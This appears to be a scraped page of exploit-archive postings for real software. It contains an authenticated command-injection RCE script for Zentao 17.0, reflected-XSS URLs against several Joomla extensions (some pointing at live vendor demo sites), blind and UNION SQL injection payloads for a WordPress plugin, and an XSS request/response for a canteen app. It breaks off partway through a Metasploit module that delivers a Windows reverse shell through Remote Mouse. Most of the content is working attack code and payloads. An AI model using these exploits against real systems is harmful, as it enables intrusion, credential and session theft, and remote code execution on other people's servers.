<pre><code># Exploit Title: Zentao Project Management System 17.0 - Authenticated Remote Code Execution<br /># Exploit Author: mister0xf <br /># Date: 2022-10-8<br /># Software Link: https://github.com/easysoft/zentaopms<br /># Version: tested on 17.0 (probably works also on newer/older versions)<br /># Tested On: Kali Linux 2022.2<br /># Exploit Tested Using: Python 3.10.4<br /># Vulnerability Description:<br /># Zentao Project Management System 17.0 suffers from an authenticated command injection allowing <br /># remote attackers to obtain Remote Code Execution (RCE) on the hosting webserver <br /><br /># Vulnerable Source Code:<br /># /module/repo/model.php:<br /># [...]<br /># $client = $this->post->client; // <-- client is taken from the POST request<br /># [...]<br /># elseif($scm == 'Git')<br /># {<br /># if(!is_dir($path))<br /># {<br /># dao::$errors['path'] = sprintf($this->lang->repo->error->noFile, $path);<br /># return false;<br /># }<br />#<br /># if(!chdir($path))<br /># {<br /># if(!is_executable($path))<br /># {<br /># dao::$errors['path'] = sprintf($this->lang->repo->error->noPriv, $path);<br /># return false;<br /># }<br /># dao::$errors['path'] = $this->lang->repo->error->path;<br /># return false;<br /># }<br />#<br /># $command = "$client tag 2>&1"; // <-- command is injected here<br /># exec($command, $output, $result);<br /><br />import requests,sys<br />import hashlib<br />from urllib.parse import urlparse<br />from bs4 import BeautifulSoup<br /><br />def banner():<br /> print('''<br /> ::::::::: :::::::::: :::: ::: :::::::: ::::::::::: ::: ::::::::<br /> :+: :+: :+:+: :+: :+: :+: :+: :+: :+: :+: :+:<br /> +:+ +:+ :+:+:+ +:+ +:+ +:+ +:+ +:+ +:+ +:+<br /> +#+ +#++:++# +#+ +:+ +#+ +#+ +#+ +#++:++#++: +#+ +:+<br /> +#+ +#+ +#+ +#+#+# +#+ +#+ +#+ +#+ +#+ +#+<br /> #+# #+# #+# #+#+# #+# #+# #+# #+# #+# #+# #+#<br />######### ########## ### #### ######## ########### ### ### ########<br /> ''')<br />def usage():<br /> print('Usage: zenciao user password http://127.0.0.1/path')<br /> <br />def main():<br /><br /> if ((len(sys.argv)-1) != 3):<br /> usage()<br /> banner()<br /> exit()<br /><br /> #proxy = {'http':'http://127.0.0.1:8080'}<br /><br /> banner()<br /> username = sys.argv[1] <br /> password = sys.argv[2] <br /> target = sys.argv[3]<br /><br /> # initialize session object<br /> session = requests.session()<br /> <br /> home_url = target+'/index.php'<br /> rand_url = target+'/index.php?m=user&f=refreshRandom&t=html'<br /> login_url = target+'/index.php?m=user&f=login&t=html'<br /> create_repo_url = target+'/index.php?m=repo&f=create&objectID=0'<br /><br /> r1 = session.get(home_url)<br /> soup = BeautifulSoup(r1.text, "html.parser")<br /> script_tag = soup.find('script')<br /> redirect_url = script_tag.string.split("'")[1]<br /> r2 = session.get(target+redirect_url)<br /><br /> # get random value<br /> session.headers.update({'X-Requested-With': 'XMLHttpRequest'})<br /> res = session.get(rand_url)<br /> rand = res.text<br /><br /> # compute md5(md5(password)+rand)<br /> md5_pwd = hashlib.md5((hashlib.md5(password.encode()).hexdigest()+str(rand)).encode())<br /><br /> # login request<br /> post_data = {"account":username,"password":md5_pwd.hexdigest(),"passwordStrength":1,"referer":"/zentaopms/www/","verifyRand":rand,"keepLogin":0,"captcha":""}<br /> my_referer = target+'/zentaopms/www/index.php?m=user&f=login&t=html'<br /> session.headers.update({'Referer': my_referer})<br /> session.headers.update({'X-Requested-With': 'XMLHttpRequest'})<br /> response = session.post(login_url, data=post_data) <br /><br /> # exploit rce<br /> # devops repo page<br /> r2 = session.get(create_repo_url)<br /> git_test_dir = '/home/'<br /> command = 'whoami;'<br /> exploit_post_data = {"SCM":"Git","name":"","path":git_test_dir,"encoding":"utf-8","client":command,"account":"","password":"","encrypt":"base64","desc":""}<br /> r3 = session.post(create_repo_url, data=exploit_post_data)<br /> print(r3.content)<br /><br />if __name__ == '__main__':<br /> main()<br /><br /><br /><br /><br /></code></pre>
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Exploits ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : extensions.joomla.org │<br />│ Vendor : e4j Extensions for Joomla - extensionsforjoomla.com │<br />│ Software : Joomla Vik Booking 1.15.0 │<br />│ Vuln Type: Reflected XSS │<br />│ Method : GET │<br />│ Impact : Manipulate the content of the site │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ B4nks-NET irc.b4nks.tk #unix ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ The attacker can send to victim a link containing a malicious URL in an email or │<br />│ instant message can perform a wide variety of actions, such as stealing the victim's │<br />│ session token or login credentials │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL <br /> <br /> CryptoJob (Twitter) twitter.com/CryptozJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2022 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Path: /index.php/en/booking<br /><br />GET parameter 'categories' is vulnerable to XSS<br /><br />https://extensionsforjoomla.com/livedemo/vikbooking/index.php/en/booking?option=com_vikbooking&task=showprc&roomsnum=1&roomopt%5B%5D=9&adults%5B%5D=2&children%5B%5D=1&days=1&checkin=1665057600&checkout=1665136800&category_id=&categories=rnrtm%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ew3vus&Itemid=103<br /><br /><br />[-] Done<br /></code></pre>
<pre><code># Exploit Title: Wordpress Plugin Zephyr Project Manager 3.2.42 - Multiple SQLi<br /># Date: 14-08-2022<br /># Exploit Author: Rizacan Tufan<br /># Blog Post: https://rizax.blog/blog/wordpress-plugin-zephyr-project-manager-multiple-sqli-authenticated<br /># Software Link: https://wordpress.org/plugins/zephyr-project-manager/<br /># Vendor Homepage: https://zephyr-one.com/<br /># Version: 3.2.42<br /># Tested on: Windows, Linux<br /># CVE : CVE-2022-2840 (https://wpscan.com/vulnerability/13d8be88-c3b7-4d6e-9792-c98b801ba53c)<br /><br /># Description<br /><br />Zephyr Project Manager is a plug-in that helps you manage and get things done effectively, all your projects and tasks.<br /><br />It has been determined that the data coming from the input field in most places throughout the application are used in=20<br />the query without any sanitize and validation.<br /><br />The details of the discovery are given below.<br /><br /># Proof of Concept (PoC)=20<br /><br />The details of the various SQL Injection on the application are given below.<br /><br />## Endpoint of Get Project Data.<br /><br />Sample Request :=20<br /><br />POST /wp-admin/admin-ajax.php HTTP/2<br />Host: vuln.local<br />Cookie: ...<br />...<br />Referer: https://vuln.local/wp-admin/admin.php?page=3Dzephyr_project_manager_projects<br />Content-Type: application/x-www-form-urlencoded; charset=3DUTF-8<br />X-Requested-With: XMLHttpRequest<br />Content-Length: 74<br />Origin: https://vuln.local<br />Sec-Fetch-Dest: empty<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Site: same-origin<br />Te: trailers<br /><br />action=3Dzpm_view_project&project_id=3D1&zpm_nonce=3D22858bf3a7<br /><br />Payload :=20<br /><br />---<br />Parameter: project_id (POST)<br /> Type: boolean-based blind<br /> Title: AND boolean-based blind - WHERE or HAVING clause<br /> Payload: action=3Dzpm_view_project&project_id=3D1 AND 4923=3D4923&zpm_nonce=3D22858bf3a7<br /><br /> Type: time-based blind<br /> Title: MySQL >=3D 5.0.12 OR time-based blind (query SLEEP)<br /> Payload: action=3Dzpm_view_project&project_id=3D1 OR (SELECT 7464 FROM (SELECT(SLEEP(20)))EtZW)&zpm_nonce=3D22858bf3a7<br /><br /> Type: UNION query<br /> Title: Generic UNION query (NULL) - 20 columns<br /> Payload: action=3Dzpm_view_project&project_id=3D-4909 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x71707a7071,0x6264514e6e4944795a6f6e4a786a6e4d4f666255434d6a5553526e43616e52576c75774743434f67,0x71786b6a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -&zpm_nonce=3D22858bf3a7<br />---<br /><br /><br />## Endpoint of Get Task Data.<br /><br />Sample Request :=20<br /><br />POST /wp-admin/admin-ajax.php HTTP/2<br />Host: vuln.local<br />Cookie: ...<br />...<br />Referer: https://vuln.local/wp-admin/admin.php?page=3Dzephyr_project_manager_tasks<br />Content-Type: application/x-www-form-urlencoded; charset=3DUTF-8<br />X-Requested-With: XMLHttpRequest<br />Content-Length: 51<br />Origin: https://vuln.local<br />Sec-Fetch-Dest: empty<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Site: same-origin<br />Te: trailers<br /><br />task_id=3D1&action=3Dzpm_view_task&zpm_nonce=3D22858bf3a7<br /><br />Payload :=20<br /><br />---<br />Parameter: task_id (POST)<br /> Type: time-based blind<br /> Title: MySQL >=3D 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: task_id=3D1 AND (SELECT 5365 FROM (SELECT(SLEEP(20)))AdIX)&action=3Dzpm_view_task&zpm_nonce=3D22858bf3a7<br />---<br /><br />## Endpoint of New Task.<br /><br />Sample Request :=20<br /><br />POST /wp-admin/admin-ajax.php HTTP/2<br />Host: vuln.local<br />Cookie: ...<br />...<br />Referer: https://vuln.local/wp-admin/admin.php?page=3Dzephyr_project_manager_tasks<br />Content-Type: application/x-www-form-urlencoded; charset=3DUTF-8<br />X-Requested-With: XMLHttpRequest<br />Content-Length: 337<br />Origin: https://vuln.local<br />Sec-Fetch-Dest: empty<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Site: same-origin<br />Te: trailers<br /><br />task_name=3Dtest&task_description=3Dtest&task_project=3D1&task_due_date=3D&task_start_date=3D&team=3D0&priority=3Dpriority_none&status=3Dtest&type=3Ddefault&recurrence%5Btype%5D=3Ddefault&parent-id=3D-1&action=3Dzpm_new_task&zpm_nonce=3D22858bf3a7<br /><br />Payload :=20<br /><br />---<br />Parameter: task_project (POST)<br /> Type: time-based blind<br /> Title: MySQL >=3D 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: task_name=3Dtest&task_description=3Dtest&task_project=3D1 AND (SELECT 3078 FROM (SELECT(SLEEP(20)))VQSp)&task_due_date=3D&task_start_date=3D&team=3D0&priority=3Dpriority_none&status=3Drrrr-declare-q-varchar-99-set-q-727aho78zk9gcoyi8asqud6osfy9m0io9hx9kz8o-oasti-fy-com-tny-exec-master-dbo-xp-dirtree-q&type=3Ddefault&recurrence[type]=3Ddefault&parent-id=3D-1&action=3Dzpm_new_task&zpm_nonce=3D22858bf3a7<br />---<br /><br /><br /></code></pre>
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Exploits ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : extensions.joomla.org │<br />│ Vendor : Heiner Klostermann - kiss-software.de │<br />│ Software : Joomla KSAdvertiser 2.5.37 │<br />│ Vuln Type: Reflected XSS │<br />│ Method : GET │<br />│ Impact : Manipulate the content of the site │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ B4nks-NET irc.b4nks.tk #unix ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ The attacker can send to victim a link containing a malicious URL in an email or │<br />│ instant message can perform a wide variety of actions, such as stealing the victim's │<br />│ session token or login credentials │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL <br /> <br /> CryptoJob (Twitter) twitter.com/CryptozJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2022 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /><br />Path: /index.php<br /><br />GET parameter 'fSpS' is vulnerable to XSS<br /><br />https://www.kiss-software.de/index.php?option=com_ksadvertiser&view=items&Itemid=0&filtercat=50&fSpS=KGNjLmlkID0gNTAgT1IgY2MucGFyZW50X2lkID0gNTApfChhLml0X2lkZW50PScxJyBPUiBhLml0X3Bob25ldGljIExJS0UgJyUxJScpfChhLnRpdGxlPScyJyBPUiBhLml0X3Bob25ldGljIExJS0UgJyUyJScpfChhLml0X2ludHJvPSczJyBPUiBhLml0X3Bob25ldGljIExJS0UgJyUzJScpfCgoYS5pdF9hZGRyZXNzPSc0JyBPUiBhLml0X3Bob25ldGljIExJS0UgJyU0JScpIEFORCBhLml0X2JveG51bWJlciA9IDApfCgoYS5pdF9wb3N0Y29kZT0nNScgT1IgYS5pdF9waG9uZXRpYyBMSUtFICclNSUnKSBBTkQgYS5pdF9ib3hudW1iZXIgPSAwKXwoKGEuaXRfY2l0eT0nNicgT1IgYS5pdF9waG9uZXRpYyBMSUtFICclNiUnKSBBTkQgYS5pdF9ib3hudW1iZXIgPSAwKWg1bjZsPHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0PmlyYzdu&lang=en<br /><br /><br />[-] Done<br /></code></pre>
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Exploits ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : extensions.joomla.org │<br />│ Vendor : Joomla JoomBri Careers 3.3.0 │<br />│ Software : JoomBri Team │<br />│ Vuln Type: Reflected XSS │<br />│ Method : GET │<br />│ Impact : Manipulate the content of the site │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ B4nks-NET irc.b4nks.tk #unix ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ The attacker can send to victim a link containing a malicious URL in an email or │<br />│ instant message can perform a wide variety of actions, such as stealing the victim's │<br />│ session token or login credentials │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL <br /> <br /> CryptoJob (Twitter) twitter.com/CryptozJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2022 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /><br />Path: /for-jobseekers/search-jobs<br /><br />GET parameter 'keyword' is vulnerable to XSS<br /><br />https://target.com/for-jobseekers/search-jobs?keyword=l9x1q%22onfocus%3d%22alert(1)%22autofocus%3d%22ak5aghi5u9p&location_id=2&jobtype_id=1&industry_id%5B%5D=2&functional_id%5B%5D=2&education_id%5B%5D=2&limit=20&option=com_career&task=<br /><br /><br />[-] Done<br /></code></pre>
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Exploits ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : extensions.joomla.org │<br />│ Vendor : Joomla JoomBri Freelance 4.5.0 │<br />│ Software : JoomBri Team │<br />│ Vuln Type: Reflected XSS │<br />│ Method : GET │<br />│ Impact : Manipulate the content of the site │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ B4nks-NET irc.b4nks.tk #unix ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ The attacker can send to victim a link containing a malicious URL in an email or │<br />│ instant message can perform a wide variety of actions, such as stealing the victim's │<br />│ session token or login credentials │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL <br /> <br /> CryptoJob (Twitter) twitter.com/CryptozJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2022 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /><br />Path: /index.php<br /><br />GET parameter 'keyword' is vulnerable to XSS<br /><br />https://target.com/index.php?keyword=xfz9b%22onfocus%3d%22alert(1)%22autofocus%3d%22nyn0r<br /><br /><br />[-] Done<br /></code></pre>
<pre><code>## Title: Canteen-Management-1.0-2022 suffers from XSS-Reflected<br />## Author: nu11secur1ty<br />## Date: 10.04.2022<br />## Vendor: https://www.mayurik.com/<br />## Software: https://github.com/nu11secur1ty/CVE-nu11secur1ty/blob/main/vendors/mayuri_k/2022/Canteen-Management/Docs/youthappam.zip?raw=true<br />## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2022/Canteen-Management<br /><br /><br />## Description:<br />The Canteen-Management-1.0-2022 suffers from XSS-Reflected vulnerability.<br />The name of an arbitrarily supplied URL parameter is copied into the<br />value of an HTML tag attribute which is encapsulated in double<br />quotation marks.<br />The attacker can craft a very malicious HTTPS URL redirecting to a<br />very malicious URL. When the victim clicks into this crafted URL the<br />game will over for him.<br /><br /><br />STATUS: High vulnerability<br /><br />[+]Payload REQUEST:<br /><br />```HTML<br />GET /youthappam/login.php/lu555%22%3E%3Ca%20href=%22https://pornhub.com/%22%20target=%22_blank%22%20rel=%22noopener%20nofollow%20ugc%22%3E%20%3Cimg%20src=%22https://raw.githubusercontent.com/nu11secur1ty/XSSight/master/nu11secur1ty/images/IMG_0068.gif?token=GHSAT0AAAAAABXWGSKOH7MBFLEKF4M6Y3YCYYKADTQ&rs=1%22%20style=%22border:1px%20solid%20black;max-width:100%;%22%20alt=%22Photo%20of%20Byron%20Bay,%20one%20of%20Australia%27s%20best%20beaches!%22%3E%20%3C/a%3Emv2me<br />HTTP/1.1<br />Host: pwnedhost.com<br />Accept-Encoding: gzip, deflate<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br />Accept-Language: en-US;q=0.9,en;q=0.8<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)<br />AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62<br />Safari/537.36<br />Connection: close<br />Cache-Control: max-age=0<br />Upgrade-Insecure-Requests: 1<br />Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="106", "Chromium";v="106"<br />Sec-CH-UA-Platform: Windows<br />Sec-CH-UA-Mobile: ?0<br />```<br /><br />[+]Payload RESPONSE:<br /><br />```burp<br />HTTP/1.1 200 OK<br />Date: Tue, 04 Oct 2022 09:44:55 GMT<br />Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6<br />X-Powered-By: PHP/8.1.6<br />Set-Cookie: PHPSESSID=m1teao9b0j86ep94m6v7ek7fe6; path=/<br />Expires: Thu, 19 Nov 1981 08:52:00 GMT<br />Cache-Control: no-store, no-cache, must-revalidate<br />Pragma: no-cache<br />Content-Length: 6140<br />Connection: close<br />Content-Type: text/html; charset=UTF-8<br /><br /><link rel="stylesheet" href="assets/css/popup_style.css"><br /> <style><br />.footer1 {<br /> position: fixed;<br /> bottom: 0;<br /> width: 100%;<br /> color: #5c4ac7;<br /> text-align: center;<br />}<br /><br /></style><br /> <!DOCTYPE html><br /><html lang="en"><br /><br /><head><br /> <meta charset="utf-8"><br /> <meta http-equiv="X-UA-Compatible" content="IE=edge"><br /><br /><meta charset="utf-8"><br /><meta name="viewport" content="width=device-width, initial-scale=1.0,<br />user-scalable=0, minimal-ui"><br /><meta http-equiv="X-UA-Compatible" content="IE=edge" /><br /><meta name="description" content=""><br /><meta name="keywords" content=""><br /><meta name="author" content=""><br /><br /> <link rel="icon" type="image/png" sizes="16x16"<br />href="assets/uploadImage/Logo/favicon.png"><br /><br /><br /><br /><br /><br /> <style type="text/css"><br />@media print {<br /> #printbtn {<br /> display : none;<br /> }<br />}<br /></style><br /> <title>Youthappam Canteen Management System - by Mayuri K.<br />Freelancer</title><br /><br /> <link href="assets/css/lib/chartist/chartist.min.css" rel="stylesheet"><br /> <link href="assets/css/lib/owl.carousel.min.css" rel="stylesheet" /><br /> <link href="assets/css/lib/owl.theme.default.min.css" rel="stylesheet" /><br /><br /> <link href="assets/css/lib/bootstrap/bootstrap.min.css" rel="stylesheet"><br /><br /> <link href="assets/css/helper.css" rel="stylesheet"><br /> <link href="assets/css/style.css" rel="stylesheet"><br /> <link rel="stylesheet"<br />href="assets/css/lib/html5-editor/bootstrap-wysihtml5.css" /><br /> <link href="assets/css/lib/calendar2/semantic.ui.min.css" rel="stylesheet"><br /> <link href="assets/css/lib/calendar2/pignose.calendar.min.css"<br />rel="stylesheet"><br /> <link href="assets/css/lib/sweetalert/sweetalert.css" rel="stylesheet"><br /> <link href="assets/css/lib/datepicker/bootstrap-datepicker3.min.css"<br />rel="stylesheet"><br /><br /><br /> <script type="text/javascript"<br />src="https://www.gstatic.com/charts/loader.js"></script><br /> <script type="text/javascript"><br /> google.charts.load("current", {packages:["corechart"]});<br /> google.charts.setOnLoadCallback(drawChart);<br /> function drawChart() {<br /> var data = google.visualization.arrayToDataTable([<br /> ['Food', 'Average sale per Day'],<br /> ['Masala dosa', 11],<br /> ['Chicken 65 ', 2],<br /> ['Karapu Boondi', 2],<br /> ['Bellam Gavvalu', 2],<br /> ['Gummadikaya Vadiyalu', 7]<br /> ]);<br /><br /> var options = {<br /> title: 'Food Average Sale per Day',<br /> pieHole: 0.4,<br /> };<br /><br /> var chart = new<br />google.visualization.PieChart(document.getElementById('donutchart'));<br /> chart.draw(data, options);<br /> }<br /> </script><br /></head><br /><br /><body class="fix-header fix-sidebar"><br /><br /><div id="page"></div><br /><div id="loading"></div><br /><br /><br /><br /><br /><br /> <div id="main-wrapper"><br /> <div class="unix-login"><br /><br /> <div class="container-fluid" style="background-image:<br />url('assets/myimages/background.jpg');<br /> background-color: #ffffff;background-size:cover"><br /> <div class="row"><br /> <div class="col-lg-4 ml-auto"><br /> <div class="login-content"><br /> <div class="login-form"><br /> <center><img<br />src="./assets/uploadImage/Logo/logo.png" style="width:<br />100%;"></center><br><br /> <form<br />action="/youthappam/login.php/lu555"><a href="https:/pornhub.com/"<br />target="_blank" rel="noopener nofollow ugc"> <img<br />src="https:/raw.githubusercontent.com/nu11secur1ty/XSSight/master/nu11secur1ty/images/IMG_0068.gif"<br />method="post" id="loginForm"><br /> <div class="form-group"><br /><br /> <input type="text"<br />name="username" id="username" class="form-control"<br />placeholder="Username" required=""><br /><br /> </div><br /> <div class="form-group"><br /><br /> <input type="password"<br />id="password" name="password" class="form-control"<br />placeholder="Password" required=""><br /> </div><br /><br /><br /> <button type="submit" name="login"<br />class="f-w-600 btn btn-primary btn-flat m-b-30 m-t-30">Sign<br />in</button><br /><br /> <!-- <div class="forgot-phone<br />text-right f-right"><br /><a href="#" class="text-right f-w-600"> Forgot Password?</a><br /></div> --><br /><br /><div class="forgot-phone text-left f-left"><br /><a href = "mailto:mayuri.infospace@gmail.com?subject = Project<br />Development Requirement&body = I saw your projects. I want to develop<br />a project" class="text-right f-w-600"> Click here to contact me</a><br /></div><br /> </form><br /> </div><br /> </div><br /> </div><br /> </div><br /> </div><br /> </div><br /> </div><br /><br /><br /><br /><br /> <script src="./assets/js/lib/jquery/jquery.min.js"></script><br /><br /> <script src="./assets/js/lib/bootstrap/js/popper.min.js"></script><br /> <script src="./assets/js/lib/bootstrap/js/bootstrap.min.js"></script><br /><br /> <script src="./assets/js/jquery.slimscroll.js"></script><br /><br /> <script src="./assets/js/sidebarmenu.js"></script><br /><br /> <script src="./assets/js/lib/sticky-kit-master/dist/sticky-kit.min.js"></script><br /><br /> <script src="./assets/js/custom.min.js"></script><br /> <script><br /><br />function onReady(callback) {<br /> var intervalID = window.setInterval(checkReady, 1000);<br /> function checkReady() {<br /> if (document.getElementsByTagName('body')[0] !== undefined) {<br /> window.clearInterval(intervalID);<br /> callback.call(this);<br /> }<br /> }<br />}<br /><br />function show(id, value) {<br /> document.getElementById(id).style.display = value ? 'block' : 'none';<br />}<br /><br />onReady(function () {<br /> show('page', true);<br /> show('loading', false);<br />});<br /> </script><br /></body><br /><br /></html><br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/edit/main/vendors/mayuri_k/2022/Canteen-Management)<br /><br />## Proof and Exploit:<br />[href](https://streamable.com/emg0zo)<br /><br />## More:<br />[href](https://www.nu11secur1ty.com/)<br /><br /><br /><br />Done:<br /><br /><br />На вт, 4.10.2022 г. в 23:24 ч. nu11 secur1ty <nu11secur1typentest@gmail.com><br />написа:<br /><br />> Tomorow I will send to you. BR<br />><br />> On Tue, Oct 4, 2022, 19:11 Packet Storm <packet@packetstormsecurity.com><br />> wrote:<br />><br />>> Missing submission<br />>><br />>> On Tue, Oct 04, 2022 at 02:23:16PM +0300, nu11 secur1ty wrote:<br />>> ><br />>> https://www.nu11secur1ty.com/2022/10/example-of-professional-penetration.html<br />>> ><br />>> https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2022/Canteen-Management<br />>> > --<br />>> > System Administrator - Infrastructure Engineer<br />>> > Penetration Testing Engineer<br />>> > Exploit developer at https://packetstormsecurity.com/<br />>> > https://cve.mitre.org/index.html and https://www.exploit-db.com/<br />>> > home page: https://www.nu11secur1ty.com/<br />>> > hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=<br />>> > nu11secur1ty <http://nu11secur1ty.com/><br />>><br />><br /><br />-- <br />System Administrator - Infrastructure Engineer<br />Penetration Testing Engineer<br />Exploit developer at https://packetstormsecurity.com/<br />https://cve.mitre.org/index.html and https://www.exploit-db.com/<br />home page: https://www.nu11secur1ty.com/<br />hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=<br /> nu11secur1ty <http://nu11secur1ty.com/><br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = NormalRanking<br /><br /> include Exploit::Remote::Tcp<br /> include Exploit::EXE # generate_payload_exe<br /> include Msf::Exploit::Remote::HttpServer::HTML<br /> include Msf::Exploit::FileDropper<br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Remote Mouse RCE',<br /> 'Description' => %q{<br /> This module utilizes the Remote Mouse Server by Emote Interactive protocol<br /> to deploy a payload and run it from the server. This module will only deploy<br /> a payload if the server is set without a password (default).<br /> Tested against 4.110, current at the time of module writing<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> 'h00die', # msf module<br /> '0RPHON', # discovery, edb module<br /> 'H4rk3nz0' # poc2<br /> ],<br /> 'References' => [<br /> [ 'EDB', '46697' ],<br /> [ 'CVE', '2022-3365' ],<br /> [ 'URL', 'https://www.remotemouse.net/' ],<br /> [ 'URL', 'https://github.com/H4rk3nz0/PenTesting/blob/main/Exploits/remote%20mouse/remote-mouse-rce.py' ]<br /> ],<br /> 'Arch' => [ ARCH_X64, ARCH_X86 ],<br /> 'Platform' => 'win',<br /> 'Stance' => Msf::Exploit::Stance::Aggressive,<br /> 'Targets' => [<br /> ['default', {}],<br /> ],<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'windows/shell/reverse_tcp'<br /> },<br /> 'DisclosureDate' => '2019-04-15',<br /> 'DefaultTarget' => 0,<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [ARTIFACTS_ON_DISK, SCREEN_EFFECTS] # typing on screen<br /> }<br /> )<br /> )<br /> register_options(<br /> [<br /> OptPort.new('RPORT', [true, 'Port Remote Mouse runs on', 1978]),<br /> OptInt.new('SLEEP', [true, 'How long to sleep between commands', 1]),<br /> OptString.new('PATH', [true, 'Where to stage payload for pull method', 'c:\\Windows\\Temp\\'])<br /> ]<br /> )<br /> end<br /><br /> def path<br /> return datastore['PATH'] if 